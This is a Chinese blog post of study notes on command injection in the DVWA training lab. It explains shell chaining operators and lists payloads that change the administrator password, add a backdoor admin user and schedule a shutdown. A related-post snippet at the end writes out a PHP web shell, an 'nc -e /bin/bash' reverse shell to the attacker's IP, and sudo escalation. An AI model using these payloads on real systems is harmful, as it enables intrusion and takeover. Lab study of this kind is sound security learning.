6.20dvwa命令注入

已于 2023-06-25 21:14:07 修改
阅读量40 收藏
点赞数
文章标签: 数学建模
于 2023-06-20 18:40:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ailkli/article/details/131308522
版权

链接:

(3条消息) 命令执行基础知识_执行命令_于尘世中迷途小书童的博客-CSDN博客

 命令注入靶场演示

(32条消息) pikachu-RCE_发奋的鼹鼠的博客-CSDN博客

命令注入使用相关函数链接: 

(32条消息) CTF-命令执行【超详细】_ctf 命令执行_不知名白帽的博客-CSDN博客

命令注入造成原因:没有做限制  用shell_exec执行函数没有过滤就执行,导致用户的输入当作指令被引用

ps:判断系统:

windows:pping四次就停

liux:ping人为不停止就不停

在命令注入过程中使用的连接符:

Windows系统:
|:只执行后面的语句。
||:如果前面的语句执行失败,则执行后面的语句。
&:两条语句都执行,如果前面的语句为假则执行后面的语句,如果前面的语句为真则不执行后面的语句。
&&:如果前面的语句为假,则直接出错,也不再执行后面的语句;前面的语句为真则两条命令都执行,前面的语句只能为真。

Linux系统:
;:执行完前面的语句再执行后面的语句,当有一条命令执行失败时,不会影响其它语句的执行。
|(管道符):只执行后面的语句。
||(逻辑或):只有前面的语句执行出错时,执行后面的语句。
&(后台任务符):两条语句都执行,如果前面的语句为假则执行后面的语句,如果前面的语句为真则不执行后面的语句。
&&(逻辑与):如果前面的语句为假则直接出错,也不再执行后面的语句;前面的语句为真则两条命令都执行,前面的语句只能为真。(命令替换):当一个命令被解析时,它首先会执行反引号之间的操作。例 echo whoami
 

实战:打开dvwa靶场进行low级别命令注入

进行ping  回环地址127.0.0.1

low级别:什么符号都没有过滤

|只执行后面

127.0.0.1 | ipconfig

127.0.0.1 | net user

127.0.0.1 | net user administrator 123456

||只要前面语句执行失败才执行后面

查看用户

abc || net user

修改管理员密码

abc || net user net user administrator 123456

添加用户

abc || net user xmm /add

提权

abc || net localgroup administrators xmm /add

远程定时关机

abc || shutdown -s -t 100  

解除

abc || shut down -a

查看配置信息

abc || systeminfo

&两条语句都执行,前面的不正确也会执行后面

127.0.0.1 & systeminfo

abc & systeminfo

前面操作要为真

php命令执行函数:

PHP-代码执行函数-命令执行函数_php命令执行函数_大风呼呼的的博客-CSDN博客

代码执行函数eval字符串按照php代码计算,需要传输参数

 

php版本问题有些函数执行不了

在vscode案例:

 

ailkli
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试--DVWA命令注入
qq_45070118的博客
07-30 1806
DVWA 命令注入:利用各种调用系统命令的web应用,通过命令拼接、绕过黑名单等方式实现在服务端实现想要实现的系统命令。 如何配置登陆看我的burpsuite爆破文章中就有 这次我分为linux和windows两个版本登录时分别把登陆网址的IP改为目标系统的IP即可 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应...
DVWA命令注入(Command Injection)
qq_54537919的博客
06-25 774
DVWA命令注入(Command Injection) 原理 low、 medium、 high
DVWA-命令注入
weixin_51513059的博客
11-01 5240
DVWA-命令注入通关 命令注入相関概念及命令注入的防御
DVWA命令注入
qq_36915061的博客
11-28 347
LOW 最简单的命令注入型似SQL注入,即在一个命令的后面添加非法输入,导致服务器执行正常语句的同时,也执行的后面的入侵语句. 例如,该条命令为ping,需要输入ip地址,127.0.0.1为正常输入,后面的& ls为非法输入 low级别的命令注入由于无任何过滤,所以简单的将入侵语句连接在正常语句后即可. 语句连接方式: A & B 前一个命令先执行不论是否...
dvwa 命令注入
wr319714471的博客
01-17 195
就哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
DVWA命令注入漏洞(Command injection)
越努力 越自由
03-10 4858
命令执行漏洞的原理:在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行(注入)漏洞。 ...
DVWA命令注入漏洞
weixin_56306210的博客
02-06 2280
DVWA命令注入漏洞
【渗透测试】|dvwa命令注入乱码问题
yangdan_jiayou的博客
06-11 471
转载:https://blog.csdn.net/weixin_75174796/article/details/130754093?1、按住win+r,在运行框中输入cmd弹出命令行,在命令行中输入“control intl.cpl”4、可以看到这里显示“非Unicode”程序中所使用的当前语言是中文,我们点击“更改区域系统设置”2、这个命令是使用control命令行工具来打开"区域和语言设置"对话框。6、可以看到,现在DVWA返回的信息已经没有乱码了。3、选中对话框中的管理选项卡。
DVWA——命令注入
hand2some2的博客
07-20 160
该文章主要是小徐在dvwa练习中命令注入的心得笔记,希望能给大家一些帮助。
DVWA-命令注入(Command Injection)
weixin_58954236的博客
08-19 483
ipconfig,net user(查看系统用户),dir(查看当前目录),find(查找包含指定字符的行),whoami(查看系统当前有效用户名)A&B(简单的拼接,AB之间无制约关系),A&&B(A执行成功才会执行B),A|B(A的输出作为B的输入),A||B(A执行失败,然后才会执行B)
DVWA命令注入(Command_Injection)出现乱码解决办法(本人的建议)
lyx3429的博客
03-04 655
DVWA命令注入(Command_Injection)出现乱码解决办法(本人的建议) 在做DVWA攻防练习时发现,注入命令返回的信息竟然是乱码,猜测可能是因为DVWA是在windows下部署的原因。 那群人为什么用英文版的我终于知道了,将UTF-8改为GB2312这个办法解决乱码的问题的不全面 在输入 192.168.168.128(虚拟机地址)测试时,发现如下乱码 2.查阅相关资料后,得知在 …/DVWA/dvwa/includes目录下,有个dvwaPage.inc.php文件,将UTF-8改为GB
Dvwa命令注入全级别学习笔记
Mbys_Lettuce的博客
09-16 402
命令注入漏洞可能是应用程序中可能发生的最危险的漏洞之一。当应用程序允许用户输入与系统命令混淆时,就会发生命令注入漏洞或操作系统命令注入漏洞。当用户输入在没有适当预防措施的情况下直接连接到系统命令中时,就会发生这种情况。
数学建模强化宝典(1)级比检验
m0_73399576的博客
08-31 773
数学建模强化宝典——级比检验篇
2024 数学建模高教社杯 国赛(A题)| “板凳龙”舞龙队 | 建模秘籍&文章代码思路大全
最新发布
数学建模小秘籍的博客
09-05 4408
在螺距为55cm的等距螺线顺时针盘入的情况下,舞龙队在每秒的时间点(从0s到300s)内,给出龙头、龙身和龙尾各前把手及龙尾后把手中心的位置和速度,并将结果保存到文件result1.xlsx中。同时在论文中列出特定时间点(0s、60s、120s、180s、240s、300s)时,各个把手的位置和速度。
2024数学建模国赛选题建议+团队助攻资料
qq_41489047的博客
09-05 1273
通过分析5个题目的特点,可知数学建模常用的模型大概可以分为五大类——
数学建模强化宝典(14)Fisher 最优分割法
m0_73399576的博客
09-05 851
数学建模强化宝典——Fisher 最优分割法篇
数学建模学习手册】python基本入门使用
小小unicorn的博客
08-30 1501
超定线性方程组(overdetermined system of linear equations)指的是方程的数量多于未知数的线性方程组。这意味着方程的数量 mmm 大于未知数的数量 nnn(即 m>nm > nm>n)。方程数量多于未知数:这类方程组往往没有精确的解,因为过多的方程对未知数施加了更多的约束条件,这些条件可能互相矛盾,无法同时满足。无法精确求解:由于不可能满足所有方程,通常需要使用最小二乘法等数值方法来找到使方程“近似成立”的解。这种解不是精确解,而是尽可能让方程残差(误差)最小的解。
数学建模备赛】Ep07:灰色预测模型
2201_75503057的博客
08-30 955
这一讲是关于数学建模的预测模型一一灰色预测模型,然后后面再讲神经网络(比较难啃)。
dvwa命令注入提权
12-05
根据提供的引用内容,dvwa命令注入提权的思路如下: 1.尝试写入一个php文件,可以使用如下命令: ``` echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php ``` 这个命令会在/var/www/html/目录下写入一个名为cmd.php的文件,其中的system($_GET["cmd"])可以执行GET请求中的cmd参数所对应的命令。 2.连接菜刀,使用如下命令: ``` nc -nvlp 4444 ``` 这个命令会在本地监听4444端口,等待菜刀连接。 3.在DVWA命令注入页面中,输入如下命令: ``` & cmd=nc -e /bin/bash 你的IP地址 4444 & ``` 其中,你的IP地址需要替换成你本地的IP地址。这个命令会在目标机器上执行nc命令,将shell连接回你的本地机器。 4.在菜刀中连接目标机器,即可获得一个shell,使用whoami命令查看当前用户,如果是www-data,则可以使用如下命令提权: ``` sudo -l ``` 这个命令会列出当前用户可以使用sudo命令执行的命令。 5.如果当前用户可以使用sudo执行任意命令,则可以使用如下命令提权: ``` sudo /bin/bash ``` 这个命令会以root权限打开一个新的shell。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值